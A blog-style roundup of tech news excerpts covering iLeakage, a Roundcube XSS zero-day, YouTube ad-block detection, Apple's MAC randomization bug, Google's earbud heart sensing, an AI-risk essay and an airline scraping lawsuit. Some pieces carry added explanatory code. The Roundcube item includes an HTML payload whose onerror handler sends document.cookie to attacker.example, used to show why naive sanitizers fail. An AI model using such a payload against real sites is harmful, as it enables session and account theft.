“We show how an attacker can induce Safari to render an arbitrary webpage, subsequently recovering sensitive information present within it using speculative execution,” the researchers wrote on an informational website. “In particular, we demonstrate how Safari allows a malicious webpage to recover secrets from popular high-value targets, such as Gmail inbox content. Finally, we demonstrate the recovery of passwords, in case these are autofilled by credential managers.”

[…]

For the attack to work, a vulnerable computer must first visit the iLeakage website. For attacks involving YouTube, Gmail, or any other specific Web property, a user should be logged into their account at the same time the attack site is open. And as noted earlier, the attacker website needs to spend about five minutes probing the visiting device. Then, using the window.open JavaScript method, iLeakage can cause the browser to open any other site and begin siphoning certain data at anywhere from 24 to 34 bits per second.
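As a quick sanity check on the numbers quoted above, the raw channel time for a 512-bit secret works out to roughly 15 to 21 seconds, consistent with the reported ~30-second average once profiling and retry overhead are included:

```python
# Back-of-the-envelope check of the figures quoted above: at the reported
# leak rate of 24-34 bits per second, how long does a 512-bit secret
# (e.g. a 64-character string) take to siphon on the raw channel alone?

SECRET_BITS = 64 * 8  # 64 ASCII characters = 512 bits

for bps in (24, 34):
    seconds = SECRET_BITS / bps
    print(f"at {bps} bit/s: {seconds:.1f} s")

# The raw channel accounts for roughly 15-21 s; the ~30 s average the
# researchers report presumably includes error correction and retries.
```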

[…]

iLeakage is a practical attack that requires only minimal physical resources to carry out. The biggest challenge—and it’s considerable—is the high caliber of technical expertise required. An attacker needs to not only have years of experience exploiting speculative execution vulnerabilities in general but also have fully reverse-engineered A- and M-series chips to gain insights into the side channel they contain. There’s no indication that this vulnerability has ever been discovered before, let alone actively exploited in the wild.

That means the chances of this vulnerability being used in real-world attacks anytime soon are slim, if not next to zero. It’s likely that Apple’s scheduled fix will be in place long before an iLeakage-style attack site becomes viable.

Source: Hackers can force iOS and macOS browsers to divulge passwords and much more | Ars Technica

Hackers Target European Government With Roundcube Webmail Bug

Winter Vivern, believed to be a Belarus-aligned hacking group, attacked European government entities and a think tank starting on Oct. 11, according to an Ars Technica report Wednesday. ESET Research discovered the hack, which exploited a zero-day vulnerability in Roundcube, a webmail server with millions of users, and allowed the group to exfiltrate sensitive emails.

Roundcube patched the XSS vulnerability on Oct. 14, two days after ESET Research reported it. Winter Vivern delivered malicious code disguised in an innocent-looking email from team.management@outlook.com; a user only had to view the message in a web browser for the attackers to gain access to all of their emails. Winter Vivern is a cyberespionage group that has been active since at least 2020, targeting governments in Europe and Central Asia.
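As a generic illustration of why merely viewing an HTML email can hand an attacker your mailbox (this is not the actual Roundcube flaw, whose details differ), consider how a naive filter can strip script tags yet miss a payload hidden in an event-handler attribute:

```python
import re

# Generic illustration (NOT the actual Roundcube vulnerability): why
# naive HTML filtering of email bodies is unsafe. Stripping <script>
# blocks misses script smuggled into event-handler attributes, which
# still executes when the message is rendered in the browser.

def naive_sanitize(html: str) -> str:
    """Remove <script> blocks -- a common but insufficient defense."""
    return re.sub(r"<script\b[^>]*>.*?</script>", "", html,
                  flags=re.IGNORECASE | re.DOTALL)

# Hypothetical payload: no <script> tag at all, so the filter passes it.
email_body = ('<img src="x" onerror="fetch('
              "'https://attacker.example/?'+document.cookie)\">")

cleaned = naive_sanitize(email_body)
assert "onerror" in cleaned  # the payload survives the filter
```

Robust webmail sanitizers therefore parse the HTML and allow-list tags and attributes rather than pattern-matching on known-bad strings.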

“Despite the low sophistication of the group’s toolset, it is a threat to governments in Europe because of its persistence, very regular running of phishing campaigns,” said Matthieu Faou, a malware researcher at ESET, in a post.

Roundcube released an update for multiple versions of its software on Oct. 16, fixing the cross-site scripting vulnerability. Despite the patch, and despite the known vulnerabilities in older versions, many installations don’t get updated by their users, says Faou.

[…]

Source: Hackers Target European Government With Roundcube Webmail Bug

Privacy advocate challenges YouTube’s ad blocking detection (which isn’t spyware)

Last week, privacy advocate (and very occasional Reg columnist) Alexander Hanff filed a complaint with the Irish Data Protection Commission (DPC) decrying YouTube’s deployment of JavaScript code to detect the use of ad blocking extensions by website visitors.

On October 16, according to the Internet Archive’s Wayback Machine, Google published a support page declaring that “When you block YouTube ads, you violate YouTube’s Terms of Service.”

“If you use ad blockers,” it continues, “we’ll ask you to allow ads on YouTube or sign up for YouTube Premium. If you continue to use ad blockers, we may block your video playback.”

YouTube’s Terms of Service do not explicitly disallow ad blocking extensions, which remain legal in the US [PDF], in Germany, and elsewhere. But the language says users may not “circumvent, disable, fraudulently engage with, or otherwise interfere with any part of the Service” – which probably includes the ads.

Image of 'Ad blockers are not allowed' popup

YouTube’s open hostility to ad blockers coincides with the recent trial deployment of a popup notice presented to web users who visit the site with an ad-blocking extension in their browser – messaging tested on a limited audience at least as far back as May.

In order to present that popup YouTube needs to run a script, changed at least twice a day, to detect blocking efforts. And that script, Hanff believes, violates the EU’s ePrivacy Directive – because YouTube did not first ask for explicit consent to conduct such browser interrogation.

[…]

Asked how he hopes the Irish DPC will respond, Hanff replied via email, “I would expect the DPC to investigate and issue an enforcement notice to YouTube requiring them to cease and desist these activities without first obtaining consent (as per [Europe’s General Data Protection Regulation (GDPR)] standard) for the deployment of their spyware detection scripts; and further to order YouTube to unban any accounts which have been banned as a result of these detections and to delete any personal data processed unlawfully (see Article 5(1) of GDPR) since they first started to deploy their spyware detection scripts.”

Hanff’s use of strikethrough formatting acknowledges the legal difficulty of using the term “spyware” to refer to YouTube’s ad block detection code. The security industry’s standard defamation defense terminology for such stuff is PUPs, or potentially unwanted programs.

[…]

Hanff’s contention that ad-blocker detection without consent is unlawful in the EU was challenged back in 2016 by the maker of a detection tool called BlockAdblock, which argued that JavaScript code is not stored in the way contemplated by Article 5(3), a provision the firm suggests was intended for cookies.

Hanff disagrees, and maintains that “The Commission and the legislators have been very clear that any access to a user’s terminal equipment which is not strictly necessary for the provision of a requested service, requires consent.

“This is also bound by CJEU Case C-673/17 (Planet49) from October 2019 which *all* Member States are legally obligated to comply with, under the [Treaty on the Functioning of the European Union] – there is no room for deviation on this issue,” he elaborated.

“If a script or other digital technology is strictly necessary (technically required to deliver the requested service) then it is exempt from the consent requirements and as such would pose no issue to publishers engaging in legitimate activities which respect fundamental rights under the Charter.

“It is long past time that companies meet their legal obligations for their online services,” insisted Hanff. “This has been law since 2002 and was further clarified in 2009, 2012, and again in 2019 – enough is enough.”

Google did not respond to a request for comment.

Source: Privacy advocate challenges YouTube’s ad blocking detection • The Register

Airbus commissions three wind-powered ships

The plane-maker on Thursday revealed it has “commissioned shipowner Louis Dreyfus Armateurs to build, own and operate these new, highly efficient vessels that will enter into service from 2026.”

The ships will have conventional engines that run on maritime diesel oil and e-methanol, the latter fuel made with a process that produces less CO2 than other efforts. Many ships run on heavy fuel oil, the gloopiest, dirtiest, and cheapest of the fuel oils. Airbus has therefore gone out of its way with the choice of diesel and e-methanol.

The ships will also feature half a dozen Flettner rotors, rotating cylinders that produce the Magnus effect – a phenomenon that produces lift thanks to pressure differences on either side of a rotating object. The rotors were invented over a century ago and are generating renewed interest as they reduce ships’ fuel requirements.
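To get a feel for the forces involved, here is a back-of-the-envelope estimate using the Kutta-Joukowski theorem. Every dimension and the spin rate below are illustrative assumptions, and real rotors achieve only a fraction of this idealized circulation:

```python
import math

# Idealized Kutta-Joukowski estimate of the sideways (Magnus) force on a
# Flettner rotor. A sketch, not engineering data: it assumes the air is
# entrained at the full surface speed of the cylinder, an upper bound
# that real rotors come nowhere near.

rho = 1.225     # air density, kg/m^3
wind = 10.0     # apparent wind speed, m/s (assumed)
radius = 2.0    # rotor radius, m (assumed)
height = 30.0   # rotor height, m (assumed)
rpm = 180.0     # rotor spin rate (assumed)

omega = rpm * 2 * math.pi / 60                 # angular speed, rad/s
surface_speed = omega * radius                 # rotor skin speed, m/s
gamma = 2 * math.pi * radius * surface_speed   # ideal circulation, m^2/s

lift_per_metre = rho * wind * gamma   # Kutta-Joukowski: L' = rho * U * Gamma
total_force = lift_per_metre * height  # newtons

print(f"ideal Magnus force: {total_force / 1000:.0f} kN")
```

Even discounted heavily for real-world losses, forces of this order explain why six rotors can meaningfully cut a cargo ship’s fuel burn.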

Here’s what they’ll look like on Airbus’s boats.

Airbus's future ocean transports

Airbus expects its three vessels to enter service from 2026 and has calculated they will reduce its average annual transatlantic CO2 emissions from 68,000 to 33,000 tonnes by 2030. […]

The craft will have capacity to move around seventy 40-foot containers and six single-aisle aircraft subassembly sets – wings, fuselage, engine pylons, horizontal and vertical tail planes. Airbus’s current ships can only move three or four of those sets.

The ships will most often travel from Saint-Nazaire, France, to an A320 assembly line in Mobile, Alabama. […]

Source: Airbus commissions three wind-powered ships • The Register

Apple’s MAC Address Privacy Feature Has Never Worked

Ever since Apple re-branded as the “Privacy” company several years back, it’s been rolling out features designed to show its commitment to protecting users. Yet while customers might feel safer using an iPhone, there’s already plenty of evidence that Apple’s branding efforts don’t always match the reality of its products. In fact, a lot of its privacy features don’t actually seem to work.

Case in point: new research shows that one of Apple’s proffered privacy tools—a feature that was supposed to anonymize mobile users’ connections to Wi-Fi—is effectively “useless.” In 2020, Apple debuted a feature that, when switched on, was supposed to hide an iPhone user’s media access control—or MAC—address. When a device connects to a Wi-Fi network, it must first send out its MAC address so the network can identify it; when the same MAC address pops up in network after network, it can be used by network observers to identify and track a specific mobile user’s movements.

Apple’s feature was supposed to give users randomized MAC addresses as a way of stopping this kind of tracking. But a bug that persisted for years apparently made the feature effectively useless.
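For illustration, per-network MAC randomization can be sketched as deriving a stable pseudorandom address per SSID from a device secret. Apple has not published its actual scheme, so every name and detail here is a hypothetical sketch of the general idea:

```python
import hmac
import hashlib

# Hypothetical sketch of per-network MAC randomization (Apple's real
# implementation is not public). The idea: derive a stable pseudorandom
# MAC per SSID from a device secret, so the device presents a different
# identity on every network but a consistent one when rejoining.

def private_mac(device_secret: bytes, ssid: str) -> str:
    digest = hmac.new(device_secret, ssid.encode(), hashlib.sha256).digest()
    mac = bytearray(digest[:6])
    mac[0] = (mac[0] | 0x02) & 0xFE  # locally administered, unicast
    return ":".join(f"{b:02x}" for b in mac)

secret = b"per-device secret"          # illustrative value
home = private_mac(secret, "HomeWiFi")
cafe = private_mac(secret, "CafeGuest")
assert home != cafe                             # new identity per network
assert home == private_mac(secret, "HomeWiFi")  # stable on rejoin
```

The bug Mysk describes defeats exactly this: a scheme like the above is pointless if the hardware MAC still leaks in other traffic on the network.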

According to a new report from Ars Technica, researchers recently tested the feature to see if it actually concealed their MAC addresses, only to find that it didn’t do that at all. Ars writes:

Despite promises that this never-changing address would be hidden and replaced with a private one that was unique to each SSID, Apple devices have continued to display the real one, which in turn got broadcast to every other connected device on the network.

One of the researchers behind the discovery of the vulnerability, Tommy Mysk, told Ars that, from the jump, “this feature was useless because of this bug,” and that, try as they might, he “couldn’t stop the devices from sending these discovery requests, even with a VPN. Even in the Lockdown Mode.”

What Apple’s justification is for advertising a feature that plainly does not work, I’m not sure. Gizmodo reached out to the company for comment and will update this story if they respond. A recent update, iOS 17.1, apparently patches the problem and ensures that the feature actually works.

Source: Apple’s MAC Address Privacy Feature Has Never Worked

Android 14 Storage Bug: Users with multiple profiles Locked Out of Devices

Android 14, the latest operating system from Google, is facing a major storage bug that is causing users to be locked out of their devices. This issue is particularly affecting users who utilize the “multiple profiles” feature. Reports suggest that the bug is comparable to being hit with “ransomware,” as users are unable to access their device storage.

Initially, it was believed that this bug was limited to the Pixel 6, but it has since been discovered that it impacts a wider range of devices upgrading to Android 14. This includes the Pixel 6, 6a, 7, 7a, Pixel Fold, and Pixel Tablet. The Google issue tracker for this bug has garnered over 350 replies, but there has been no response from Google so far. The bug has been assigned the medium priority level of “P2” and remains unassigned, indicating that no one is actively investigating it.

Users who have encountered this storage bug have shared log files containing concerning messages such as “Failed to open directory /data/media/0: Structure needs cleaning.” This issue leads to various problematic situations, with some users experiencing boot loops, others stuck on a “Pixel is starting…” message, and some unable to take screenshots or access their camera app due to the lack of storage. Users are also unable to view files on their devices from a PC over USB, and the System UI and Settings repeatedly crash. Essentially, without storage, the device becomes practically unusable.
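One detail worth decoding: “Structure needs cleaning” is not an Android-specific string. It is the stock Linux error message for EUCLEAN, the errno a filesystem driver (ext4 here) returns when it detects on-disk corruption, which is why the affected storage becomes unreadable:

```python
import errno
import os

# "Structure needs cleaning" is the standard Linux message for EUCLEAN,
# the errno returned when a filesystem finds on-disk corruption.
# (EUCLEAN is Linux-only; this sketch assumes a Linux/glibc system.)

if hasattr(errno, "EUCLEAN"):
    print(errno.EUCLEAN, os.strerror(errno.EUCLEAN))
    # On Linux/glibc this prints: 117 Structure needs cleaning
```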

Android’s user-profile system, designed to accommodate multiple users and separate work and personal profiles, appears to be the cause of this rarely encountered bug. Users have reported that the primary profile, which is typically the most important one, becomes locked out.

Source: Android 14 Storage Bug: Users Locked Out of Devices

Google turned ANC earbuds into heart rate sensor

Google today detailed its research into audioplethysmography (APG) that adds heart rate sensing capabilities to active noise canceling (ANC) headphones and earbuds “with a simple software upgrade.”

Google says the “ear canal [is] an ideal location for health sensing” given that the deep ear artery “forms an intricate network of smaller vessels that extensively permeate the auditory canal.”

This audioplethysmography approach works by “sending a low intensity ultrasound probing signal through an ANC headphone’s speakers.”

This signal triggers echoes, which are received via on-board feedback microphones. We observe that the tiny ear canal skin displacement and heartbeat vibrations modulate these ultrasound echoes.

A model that Google created works to process that feedback into a heart rate reading, as well as heart rate variability (HRV) measurement. This technique works even with music playing and “bad earbuds seals.” However, it was impacted by body motion, and Google countered with a multi-tone approach that serves as a calibration tool to “find the best frequency that measures heart rate, and use only the best frequency to get high-quality pulse waveform.”
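A toy demodulation along the lines described above can be sketched as follows. The parameters are illustrative (the real system uses inaudible ultrasonic tones and Google’s own models, not an audio-rate carrier), but the rectify-and-smooth envelope recovery is the classic technique:

```python
import math

# Toy sketch of the APG idea: a heartbeat at 72 bpm amplitude-modulates
# a probe tone; rectifying and low-pass filtering the returned echo
# recovers the pulse envelope, whose cycle count gives the heart rate.
# Illustrative only -- the real carrier is ultrasonic and the real
# pipeline uses a learned model, per Google's description.

FS = 4000           # sample rate, Hz
DURATION = 10.0     # seconds of simulated echo
CARRIER = 500.0     # probe tone, Hz (real APG uses ultrasound)
PULSE_HZ = 72 / 60  # simulated heart rate: 1.2 Hz

n = int(FS * DURATION)
echo = [(1 + 0.05 * math.sin(2 * math.pi * PULSE_HZ * i / FS))
        * math.sin(2 * math.pi * CARRIER * i / FS) for i in range(n)]

# Envelope detection: rectify, then moving-average away the carrier.
rect = [abs(x) for x in echo]
win = FS // 20  # 50 ms window spans many carrier cycles
csum = [0.0]
for x in rect:
    csum.append(csum[-1] + x)
env = [(csum[i + win] - csum[i]) / win for i in range(n - win)]

# Heart rate = upward mean-crossings of the envelope, scaled to a minute.
mean = sum(env) / len(env)
beats = sum(1 for a, b in zip(env, env[1:]) if a < mean <= b)
bpm = beats * 60 / DURATION
print(f"estimated heart rate: {bpm:.0f} bpm")
```

The interesting engineering in APG is everything this sketch omits: motion artifacts, multi-tone calibration, and keeping the probe signal inaudible while music plays.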

Google performed two sets of studies with 153 people that found APG “achieves consistently accurate heart rate (3.21% median error across participants in all activity scenarios) and heart rate variability (2.70% median error in inter-beat interval) measurements.”

Compared to existing HR sensors, it’s not impacted by skin tone. Ear canal size and “sub-optimal seal conditions” also do not impact accuracy. Google believes this is a better approach than putting traditional photoplethysmogram (PPG) and electrocardiogram (ECG) sensors, as well as a microcontroller, in headphones/earbuds:

…this sensor mounting paradigm inevitably adds cost, weight, power consumption, acoustic design complexity, and form factor challenges to hearables, constituting a strong barrier to its wide adoption.

Google closes with:

APG transforms any TWS ANC headphones into smart sensing headphones with a simple software upgrade, and works robustly across various user activities. The sensing carrier signal is completely inaudible and not impacted by music playing. More importantly, APG represents new knowledge in biomedical and mobile research and unlocks new possibilities for low-cost health sensing.

“APG is the result of collaboration across Google Health, product, UX and legal teams,” so this coming to Pixel Buds is far from guaranteed at this point.

Source: Google turned ANC earbuds into heart rate sensor

AI Risks – doomsayers, warriors, reformers

There is no shortage of researchers and industry titans willing to warn us about the potential destructive power of artificial intelligence. Reading the headlines, one would hope that the rapid gains in AI technology have also brought forth a unifying realization of the risks—and the steps we need to take to mitigate them.

The reality, unfortunately, is quite different. Beneath almost all of the testimony, the manifestoes, the blog posts, and the public declarations issued about AI are battles among deeply divided factions. Some are concerned about far-future risks that sound like science fiction. Some are genuinely alarmed by the practical problems that chatbots and deepfake video generators are creating right now. Some are motivated by potential business revenue, others by national security concerns.

The result is a cacophony of coded language, contradictory views, and provocative policy demands that are undermining our ability to grapple with a technology destined to drive the future of politics, our economy, and even our daily lives.

These factions are in dialogue not only with the public but also with one another. Sometimes, they trade letters, opinion essays, or social threads outlining their positions and attacking others’ in public view. More often, they tout their viewpoints without acknowledging alternatives, leaving the impression that their enlightened perspective is the inevitable lens through which to view AI. But if lawmakers and the public fail to recognize the subtext of their arguments, they risk missing the real consequences of our possible regulatory and cultural paths forward.

To understand the fight and the impact it may have on our shared future, look past the immediate claims and actions of the players to the greater implications of their points of view. When you do, you’ll realize this isn’t really a debate only about AI. It’s also a contest about control and power, about how resources should be distributed and who should be held accountable.

Beneath this roiling discord is a true fight over the future of society. Should we focus on avoiding the dystopia of mass unemployment, a world where China is the dominant superpower, or a society where the worst prejudices of humanity are embodied in opaque algorithms that control our lives? Should we listen to wealthy futurists who discount the importance of climate change because they’re already thinking ahead to colonies on Mars? It is critical that we begin to recognize the ideologies driving what we are being told. Resolving the fracas requires us to see through the specter of AI to stay true to the humanity of our values.

One way to decode the motives behind the various declarations is through their language. Because language itself is part of their battleground, the different AI camps tend not to use the same words to describe their positions. One faction describes the dangers posed by AI through the framework of safety, another through ethics or integrity, yet another through security, and others through economics. By decoding who is speaking and how AI is being described, we can explore where these groups differ and what drives their views.

The Doomsayers

The loudest perspective is a frightening, dystopian vision in which AI poses an existential risk to humankind, capable of wiping out all life on Earth. AI, in this vision, emerges as a godlike, superintelligent, ungovernable entity capable of controlling everything. AI could destroy humanity or pose a risk on par with nukes. If we’re not careful, it could kill everyone or enslave humanity. It’s likened to monsters like the Lovecraftian shoggoths, artificial servants that rebelled against their creators, or paper clip maximizers that consume all of Earth’s resources in a single-minded pursuit of their programmed goal. It sounds like science fiction, but these people are serious, and they mean the words they use.

These are the AI safety people, and their ranks include the “Godfathers of AI,” Geoff Hinton and Yoshua Bengio. For many years, these leading lights battled critics who doubted that a computer could ever mimic the capabilities of the human mind. Having steamrollered the public conversation by creating large language models like ChatGPT and other AI tools capable of increasingly impressive feats, they appear deeply invested in the idea that there is no limit to what their creations will be able to accomplish.

This doomsaying is boosted by a class of tech elite that has enormous power to shape the conversation. And some in this group are animated by the radical effective altruism movement and the associated cause of long-term-ism, which tend to focus on the most extreme catastrophic risks and emphasize the far-future consequences of our actions. These philosophies are hot among the cryptocurrency crowd, like the disgraced former billionaire Sam Bankman-Fried, who at one time possessed sudden wealth in search of a cause.

Reasonable sounding on their face, these ideas can become dangerous if stretched to their logical extremes. A dogmatic long-termer would willingly sacrifice the well-being of people today to stave off a prophesied extinction event like AI enslavement.

Many doomsayers say they are acting rationally, but their hype about hypothetical existential risks amounts to making a misguided bet with our future. In the name of long-term-ism, Elon Musk reportedly believes that our society needs to encourage reproduction among those with the greatest culture and intelligence (namely, his ultrarich buddies). And he wants to go further, such as limiting the right to vote to parents and even populating Mars. It’s widely believed that Jaan Tallinn, the wealthy long-termer who co-founded the most prominent centers for the study of AI safety, has made dismissive noises about climate change because he thinks that it pales in comparison with far-future unknown unknowns like risks from AI. The technology historian David C. Brock calls these fears “wishful worries”—that is, “problems that it would be nice to have, in contrast to the actual agonies of the present.”

More practically, many of the researchers in this group are proceeding full steam ahead in developing AI, demonstrating how unrealistic it is to simply hit pause on technological development. But the roboticist Rodney Brooks has pointed out that we will see the existential risks coming—the dangers will not be sudden and we will have time to change course. While we shouldn’t dismiss the Hollywood nightmare scenarios out of hand, we must balance them with the potential benefits of AI and, most important, not allow them to strategically distract from more immediate concerns. Let’s not let apocalyptic prognostications overwhelm us and smother the momentum we need to develop critical guardrails.

The Reformers

While the doomsayer faction focuses on the far-off future, its most prominent opponents are focused on the here and now. We agree with this group that there’s plenty already happening to cause concern: Racist policing and legal systems that disproportionately arrest and punish people of color. Sexist labor systems that rate feminine-coded résumés lower. Superpower nations automating military interventions as tools of imperialism and, someday, killer robots.

The alternative to the end-of-the-world, existential risk narrative is a distressingly familiar vision of dystopia: a society in which humanity’s worst instincts are encoded into and enforced by machines. The doomsayers think AI enslavement looks like the Matrix; the reformers point to modern-day contractors doing traumatic work at low pay for OpenAI in Kenya.

Propagators of these AI ethics concerns—like Meredith Broussard, Safiya Umoja Noble, Rumman Chowdhury, and Cathy O’Neil—have been raising the alarm on inequities coded into AI for years. Although we don’t have a census, it’s noticeable that many leaders in this cohort are people of color, women, and people who identify as LGBTQ. They are often motivated by insight into what it feels like to be on the wrong end of algorithmic oppression and by a connection to the communities most vulnerable to the misuse of new technology. Many in this group take an explicitly social perspective: When Joy Buolamwini founded an organization to fight for equitable AI, she called it the Algorithmic Justice League. Ruha Benjamin called her organization the Ida B. Wells Just Data Lab.

Others frame efforts to reform AI in terms of integrity, calling for Big Tech to adhere to an oath to consider the benefit of the broader public alongside—or even above—their self-interest. They point to social media companies’ failure to control hate speech or how online misinformation can undermine democratic elections. Adding urgency for this group is that the very companies driving the AI revolution have, at times, been eliminating safeguards. A signal moment came when Timnit Gebru, a co-leader of Google’s AI ethics team, was dismissed for pointing out the risks of developing ever-larger AI language models.

While doomsayers and reformers share the concern that AI must align with human interests, reformers tend to push back hard against the doomsayers’ focus on the distant future. They want to wrestle the attention of regulators and advocates back toward present-day harms that are exacerbated by AI misinformation, surveillance, and inequity. Integrity experts call for the development of responsible AI, for civic education to ensure AI literacy and for keeping humans front and center in AI systems.

This group’s concerns are well documented and urgent—and far older than modern AI technologies. Surely, we are a civilization big enough to tackle more than one problem at a time; even those worried that AI might kill us in the future should still demand that it not profile and exploit us in the present.

The Warriors

Other groups of prognosticators cast the rise of AI through the language of competitiveness and national security. One version has a post-9/11 ring to it—a world where terrorists, criminals, and psychopaths have unfettered access to technologies of mass destruction. Another version is a Cold War narrative of the United States losing an AI arms race with China and its surveillance-rich society.

Some arguing from this perspective are acting on genuine national security concerns, and others have a simple motivation: money. These perspectives serve the interests of American tech tycoons as well as the government agencies and defense contractors they are intertwined with.

OpenAI’s Sam Altman and Meta’s Mark Zuckerberg, both of whom lead dominant AI companies, are pushing for AI regulations that they say will protect us from criminals and terrorists. Such regulations would be expensive to comply with and are likely to preserve the market position of leading AI companies while restricting competition from start-ups. In the lobbying battles over Europe’s trailblazing AI regulatory framework, US megacompanies pleaded to exempt their general-purpose AI from the tightest regulations, and whether and how to apply high-risk compliance expectations on noncorporate open-source models emerged as a key point of debate. All the while, some of the moguls investing in upstart companies are fighting the regulatory tide. The Inflection AI co-founder Reid Hoffman argued, “The answer to our challenges is not to slow down technology but to accelerate it.”

Any technology critical to national defense usually has an easier time avoiding oversight, regulation, and limitations on profit. Any readiness gap in our military demands urgent budget increases and funds distributed to the military branches and their contractors, because we may soon be called upon to fight. Tech moguls like Google’s former chief executive Eric Schmidt, who has the ear of many lawmakers, signal to American policymakers about the Chinese threat even as they invest in US national security concerns.

The warriors’ narrative overlooks how different science and engineering are today from what they were during the mid-twentieth century. AI research is fundamentally international; no one country will win a monopoly. And while national security is important to consider, we must also be mindful of the self-interest of those positioned to benefit financially.


As the science-fiction author Ted Chiang has said, fears about the existential risks of AI are really fears about the threat of uncontrolled capitalism, and dystopias like the paper clip maximizer are just caricatures of every start-up’s business plan. Cosma Shalizi and Henry Farrell further argue that “we’ve lived among shoggoths for centuries, tending to them as though they were our masters” as monopolistic platforms devour and exploit the totality of humanity’s labor and ingenuity for their own interests. This dread applies as much to our future with AI as it does to our past and present with corporations.

Regulatory solutions do not need to reinvent the wheel. Instead, we need to double down on the rules that we know limit corporate power. We need to get more serious about establishing good and effective governance on all the issues we lost track of while we were becoming obsessed with AI, China, and the fights picked among robber barons.

By analogy to the healthcare sector, we need an AI public option to truly keep AI companies in check. A publicly directed AI development project would serve as a counterbalance to for-profit corporate AI and help ensure an even playing field for access to the twenty-first century’s key technology while offering a platform for the ethical development and use of AI.

Also, we should embrace the humanity behind AI. We can hold founders and corporations accountable by mandating greater AI transparency in the development stage, in addition to applying legal standards for actions associated with AI. Remarkably, this is something that both the left and the right can agree on.

Ultimately, we need to make sure the network of laws and regulations that govern our collective behavior is knit more strongly, with fewer gaps and greater ability to hold the powerful accountable, particularly in those areas most sensitive to our democracy and environment. As those with power and privilege seem poised to harness AI to accumulate much more or pursue extreme ideologies, let’s think about how we can constrain their influence in the public square rather than cede our attention to their most bombastic nightmare visions for the future.

This essay was written with Nathan Sanders, and previously appeared in the New York Times.

Source: AI Risks – Schneier on Security

Air Canada Sues Website That Helps People Book More Flights, Simultaneously Calls Its Own Website Team Incompetent Beyond Belief

I am so frequently confused by companies that sue other companies for making their own sites and services more useful. It happens quite often. And quite often, the lawsuits are questionable CFAA claims against websites that scrape data to provide a better consumer experience, but one that still ultimately benefits the originating site.

Over the last few years various airlines have really been leading the way on this, with Southwest being particularly aggressive in suing companies that help people find Southwest flights to purchase. Unfortunately, many of these lawsuits are succeeding, to the point that a court has literally said that a travel company can’t tell others how much Southwest flights cost.

But the latest lawsuit of this nature doesn’t involve Southwest, and is quite possibly the dumbest one. Air Canada has sued the site Seats.aero, which helps users figure out the best flights for their frequent flyer miles. Seats.aero is a small operation run by the company with the best name ever: Localhost, meaning that the lawsuit is technically “Air Canada v. Localhost,” which sounds almost as dumb as this lawsuit is.

The Air Canada Group brings this action because Mr. Ian Carroll—through Defendant Localhost LLC—created a for-profit website and computer application (or “app”)— both called Seats.aero—that use substantial amounts of data unlawfully scraped from the Air Canada Group’s website and computer systems. In direct violation of the Air Canada Group’s web terms and conditions, Carroll uses automated digital robots (or “bots”) to continuously search for and harvest data from the Air Canada Group’s website and database. His intrusions are frequent and rapacious, causing multiple levels of harm, e.g., placing an immense strain on the Air Canada Group’s computer infrastructure, impairing the integrity and availability of the Air Canada Group’s data, soiling the customer experience with the Air Canada Group, interfering with the Air Canada Group’s business relations with its partners and customers, and diverting the Air Canada Group’s resources to repair the damage. Making matters worse, Carroll uses the Air Canada Group’s federally registered trademarks and logo to mislead people into believing that his site, app, and activities are connected with and/or approved by the real Air Canada Group and lending an air of legitimacy to his site and app. The Air Canada Group has tried to stop Carroll’s activities via a number of technological blocking measures. But each time, he employs subterfuge to fraudulently access and take the data—all the while boasting about his exploits and circumvention online.

Almost nothing in this makes any sense. Having third parties scrape sites for data about prices is… how the internet works. Whining about it is stupid beyond belief. And here, it’s doubly stupid, because anyone who finds a flight via seats.aero is then sent to Air Canada’s own website to book that flight. Air Canada is making money because Carroll’s company is helping people find Air Canada flights they can take.

Why are they mad?

Air Canada’s lawyers also seem technically incompetent. I mean, what the fuck is this?

Through screen scraping, Carroll extracts all of the data displayed on the website, including the text and images.

Carroll also employs the more intrusive API scraping to further feed Defendant’s website.

If the “API scraping” is “more intrusive” than screen scraping, you’re doing your APIs wrong. Is Air Canada saying that its tech team is so incompetent that its API puts more load on the site than scraping does? Because, if so, Air Canada should fire its tech team. The whole point of an API is to let others access data from your website without resorting to the more cumbersome process of scraping.
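An API serving a handful of hot queries (say, award availability by route) should also be trivially cacheable, so repeated identical requests never touch the backend at all. As a hedged illustration — this is a generic sketch, not anything reflecting Air Canada’s actual stack, and the route lookup is a made-up stand-in — a minimal in-process TTL cache in Python:

```python
import time
from functools import wraps

def ttl_cache(ttl_seconds):
    """Cache a function's result per argument tuple for ttl_seconds."""
    def decorator(fn):
        store = {}  # args -> (value, timestamp)

        @wraps(fn)
        def wrapper(*args):
            now = time.monotonic()
            hit = store.get(args)
            if hit is not None and now - hit[1] < ttl_seconds:
                return hit[0]  # served from cache; no backend hit
            value = fn(*args)
            store[args] = (value, now)
            return value

        return wrapper
    return decorator

# Hypothetical expensive backend lookup (stand-in for a database query).
calls = 0

@ttl_cache(ttl_seconds=60)
def award_availability(origin, destination):
    global calls
    calls += 1
    return f"{origin}->{destination}: seats available"

award_availability("YYZ", "LHR")
award_availability("YYZ", "LHR")  # second call served from cache
print(calls)  # backend was hit only once
```

With even a short TTL like this, a scraper polling the same routes “multiple times per day” would mostly be hitting cache, not infrastructure.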

And, yes, this lawsuit really calls into question Air Canada’s tech team and their ability to run a modern website. If your website can’t handle having its flights and prices scraped a few times every day, then you shouldn’t have a website. Get some modern technology, Air Canada:

Defendant’s avaricious data scraping generates frequent and myriad requests to the Air Canada Group’s database—far in excess of what the Air Canada Group’s infrastructure was designed to handle. Its scraping collects a large volume of data, including flight data within a wide date range and across extensive flight origins and destinations—multiple times per day.

Maybe… invest in better infrastructure like basically every other website that can handle some basic scraping? Or, set up your API so it doesn’t fall over when used for normal API things? Because this is embarrassing:

At times, Defendant’s voluminous requests have placed such immense burdens on the Air Canada Group’s infrastructure that it has caused “brownouts.” During a brownout, a website is unresponsive for a period of time because the capacity of requests exceeds the capacity the website was designed to accommodate. During brownouts caused by Defendant’s data scraping, legitimate customers are unable to use [the website] or the Air Canada + Aeroplan mobile app, including to search for available rewards, redeem Aeroplan points for the rewards, search for and view reward travel availability, book reward flights, contact Aeroplan customer support, and/or obtain service through the Aeroplan contact center due to the high volume of calls during brownouts.

Air Canada’s lawyers also seem wholly unfamiliar with the concept of nominative fair use for trademarks. If you’re displaying someone’s trademarks for the sake of accurately talking about them, there’s no likelihood of confusion and no concern about the source of the information. Air Canada claiming that this is trademark infringement is ridiculous.

I guarantee that no one using Seats.aero thinks that they’re on Air Canada’s website.

The whole thing is so stupid that it makes me never want to fly Air Canada again. I don’t trust an airline that can’t set up its website/API to handle someone making its flights more attractive to buyers.

But, of course, in these crazy times with the way the CFAA has been interpreted, there’s a decent chance Air Canada could win.

